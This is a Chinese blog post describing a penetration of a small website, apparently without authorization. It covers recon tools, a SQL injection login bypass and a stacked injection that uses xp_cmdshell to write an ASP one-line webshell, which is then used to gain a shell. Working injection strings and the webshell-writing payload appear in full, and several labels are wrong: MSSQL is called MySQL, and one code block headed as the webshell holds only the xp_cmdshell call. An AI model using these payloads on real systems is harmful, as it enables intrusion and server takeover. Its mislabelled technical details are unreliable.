一次渗透经历 – 作者:tomyyyyy

信息收集

首先进行常规的信息收集,收集网站的whois信息,ip信息,中间件信息,端口信息等。

然后判断是否具有cdn(我测试的是一个小网站,一般并没有cdn)

我一般是在测速网站测试ip,eg:

* 17CE

1.看是否存在cdn

存在的话,查找真实ip

– 从国外去访问,查看ip信息
– 去掉www,然后查看ip信息

2.旁站信息

– webscan.cc

– 站长之家

3.C段信息

– webscan.cc

– 站长之家

4.子域名信息

– layer子域名挖掘机
– subdomain

5.端口信息

– nmap
– portscan

6.网站目录信息

– dirsearch
– dirb

收集这些信息,目的是扩大攻击面,寻找防护薄弱点和可利用信息

寻找可能存在漏洞的地方

– 登陆界面    可能存在sql注入,可以先使用admin’ or 1=1 –+ 之类的语句尝试绕过

– 搜索界面    可能存在sql注入和存储型和DOM型xss等

– 上传界面    可以上传一些木马之类东西:

eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)

涉及密码或者其它敏感信息的地方   可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化

过程

我收集信息完发现子域名信息后,找到一个可以访问的域名,找出ip,进行端口扫描和网站目录爆破,直接发现了后台管理界面,尝试万能密码进行绕过。

绕过成功,但是里面没有什么可以利用的信息,

只能寻找其它信息或者上传接口,然后以外的发现登录窗口的数据库权限是管理员。

然后尝试调用mysql的写入权限,发现并没有开启,但是我是管理员权限,

查阅资料得到开启mysql存储权限的命令,直接执行。

然后写入一句话木马。

一句话木马:

```sql
exec master..xp_cmdshell
```

mysql开启存储过程

```sql
exec master..xp_cmdshell
```

echo中使用^转义特殊字符

```sql
ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+
```

定义一个变量,然后将变量输入到文件中

```sql
sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+
```

写入成功之后就可以直接连接了。

获取到shell。

参考链接

https://www.xuebuyuan.com/1851454.html?tdsourcetag=s_pctim_aiomsg

https://blog.csdn.net/l1028386804/article/details/84206143

来源:freebuf.com 2020-09-15 13:38:32 by: tomyyyyy

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论